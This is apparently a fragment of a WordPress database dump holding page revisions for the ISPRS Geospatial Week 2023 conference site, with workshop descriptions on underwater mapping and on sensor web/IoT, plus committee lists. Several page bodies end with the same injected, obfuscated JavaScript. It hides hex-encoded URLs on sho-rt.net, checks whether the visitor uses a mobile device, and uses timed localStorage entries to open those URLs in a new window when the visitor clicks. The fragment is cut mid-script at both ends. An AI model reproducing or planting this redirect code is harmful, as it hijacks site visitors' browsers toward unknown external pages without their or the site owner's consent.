i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>SO&amp;C: Sensor orientation and calibration for mapping and navigation purposes</strong>','','inherit','closed','closed','','3266-revision-v1','','','2023-02-05 14:41:00','2023-02-05 14:41:00','',3266,'https://gsw2023.com/?p=3843',0,'revision','',0),
(3844,1,'2023-02-05 14:41:13','2023-02-05 14:41:13','[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3349\" img_size=\"300x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]\r\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Underwater Mapping Workshop : Geospatial techniques for underwater documentation, mapping and monitoring</strong></span></h5>\r\n<h5></h5>\r\n<h5></h5>\r\n&nbsp;\r\n<h5 style=\"text-align: justify;\">In recent years, there has been a growing interest in methods and techniques for documenting, mapping and monitoring inland, coastal and open sea underwater environments. Drivers are diverse and range from the research of traces from the past to the protection and sustainable use of natural resources, from monitoring of marine ecosystems to hydrological studies. This workshop will gather contributions on state of the art and future trends on, but not limited to, the following topics: underwater photogrammetry, through water airborne photo-bathymetry and lidar-bathymetry, acoustic and optical positioning, underwater geodetic surveying, visual inertial simultaneous localization and mapping, subsea metrology, multi and hyper spectral imaging, underwater autonomous unmanned and tethered systems, underwater change monitoring. The workshop will be part of the ISPRS Geospatial Week 2023 and is hosted by the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) in parallel with several related geospatial workshops.</h5>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"turquoise\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"60\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"turquoise\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h5 style=\"text-align: justify; color: blue;\"><u>Themes of event:</u></h5>\r\n<ul>\r\n 	<li>\r\n<h6><strong>Multimedia geometry for underwater image and range measurements</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Geometric calibration, colour correction and restoration, validation of systems for underwater 3D measurements</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Combined above-water, through-water and underwater techniques for 3D modelling and mapping of coastal habitat</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Lidar, photo and spectrally derived bathymetry for seafloor and water surface measurement</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Spaceborne techniques and applications for coastal mapping</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>AI-driven solutions for through-water, underwater and habitat mapping applications</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Algorithms and methods for underwater localization, navigation and mapping, including, SLAM, visual inertial odometry, augmented and virtual reality applications</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Sensors’ integration and performance evaluation of UAVs, UUVs (ROVs and AUVs), towed vehicles and diver operated systems</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Underwater applications and methods in archaeology, habitat mapping and monitoring, industrial metrology and inspections, volumetric reconstruction for flow tracking</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Using/creating benchmark data sets</strong></h6>\r\n</li>\r\n</ul>\r\n<h5 style=\"text-align: justify; color: blue;\"><strong><u>Scientific Committee:</u></strong></h5>\r\n<ul>\r\n 	<li>\r\n<h6><strong>Loïca Avanthey, SEAL, LRE, EPITA, France</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Michael Bleier, Computer Science VII: Robotics and Telematics, Julius-Maximilians-Universität Würzburg, Germany</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Fabio Bruno, Department of Mechanical, Energetics and Management Engineering, University of Calabria, 3D Research s.r.l., Arcavacata di Rende, Italy</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Alessandro Capra, University of Modena and Reggio Emilia, Italy</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Silvio Del Pizzo, Parthenope University of Naples, Naples, Italy</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Pierre Drap, LIS UMR CNRS, Marseille, France, France</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Nuno Gracias, ViCOROB - Computer vision and robotics research Institute, Universitat de Girona, Spain</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Kevin Köser, Oceanic Machine Vision, GEOMAR Helmholtz Centre for Ocean Research Kiel, Germany</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Hans-Gerd Maas, Institute of Photogrammetry and Remote Sensing, TU Dresden, Germany</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Nikola Miskovic, Laboratory for Underwater Systems and Technologies – LABUST, Faculty of Electrical Engineering and Computing, Department of Control and Computer Engineering, University of Zagreb, Croatia</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Mohammad Motasem Nawaf, Aix-Marseille University, LIS UMR CNRS, Marseille, France</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Gaia Pavoni, Visual Computing Lab, Institute of Information Science and Technologies \"Alessandro Faedo\" (ISTI), CNR, Italy</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Alessandro Ridolfi, Dipartimento di Ingegneria Industriale (DIEF), Università degli Studi di Firenze, Firenze, Italy</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Katja Richter, Institute of Photogrammetry and Remote Sensing, TU Dresden, Germany</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Robin Rofallski, Jade University of Applied Sciences, Oldenburg &amp; KARO3D Vision, Oldenburg, Germany</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Mark Shortis, FSSSI FRICS (Retired) Honorary Professor, School of Science RMIT University, Melbourne, Australia</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Tali Treibitz,  Viseaon Marine Imaging Lab, Charney School of Marine Sciences, University of Haifa, Israel</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Patrick Westfeld, Federal Maritime and Hydrographic Agency (BSH), Germany</strong></h6>\r\n</li>\r\n</ul>\r\n<h6><strong>.</strong></h6>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Underwater Mapping Workshop : Geospatial techniques for underwater documentation, mapping and monitoring</strong>','','inherit','closed','closed','','3334-revision-v1','','','2023-02-05 14:41:13','2023-02-05 14:41:13','',3334,'https://gsw2023.com/?p=3844',0,'revision','',0),
(3845,1,'2023-02-05 14:41:23','2023-02-05 14:41:23','[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3396\" img_size=\"600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]<!-- /wp:paragraph -->\r\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Intelligent Systems in Sensor Web and Internet of Things</strong></span></h5>\r\n<h5 class=\"fancy-subtitle start-animation-done start-animation\" style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Organized by ISPRS WG IV/7</strong></span></h5>\r\n&nbsp;\r\n<h5 style=\"text-align: justify; color: black;\">This workshop aims at discussing the advancement of open standards, methods, algorithms, and systems that are related to sensor web, internet of things (IoT), crowdsourcing, and intelligent systems to support human decision and planning, facilitate knowledge-aware digital twins, and improve governance of smart cities. We welcome papers that address the above <u>from a geospatial perspective</u>, as well as aspects beyond technologies, i.e., social and organizational issues related to the real-time use and citizen trustiness of data obtained from sensors, IoT devices, and crowdsourcing.</h5>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h2 style=\"text-align: center;\"><strong>CHAIRS</strong></h2>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" resized_image_dimensions=\"6x8\" img_max_width=\"80px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"61\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h5><strong>Themes of Event</strong></h5>\r\n<ul>\r\n 	<li>\r\n<h6>Fusion and integration of data from sensors, IoT devices, and crowd sources for supporting digital twins and smart cities.</h6>\r\n</li>\r\n 	<li>\r\n<h6>New methods and techniques (e.g., machine learning and deep learning based, decentralized processing, and edge computing) for analyzing, predicting, and simulating data from sensors, IoT devices, and crowd sources.</h6>\r\n</li>\r\n 	<li>\r\n<h6>Research on ethical use of and trust in data from ubiquitous sensors, IoT devices, crowdsourcing, and intelligent systems.</h6>\r\n</li>\r\n 	<li>\r\n<h6>Potential of sensor web, Internet of Things, crowdsourcing, participatory and intelligent systems for user-centered planning and decision support, situational awareness and emergency management.</h6>\r\n</li>\r\n 	<li>\r\n<h6>Efficient use of the data from sensors, IoT devices, crowdsourcing, and intelligent/participatory systems for supporting the implementation of UNs’ SDGs.</h6>\r\n</li>\r\n</ul>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const 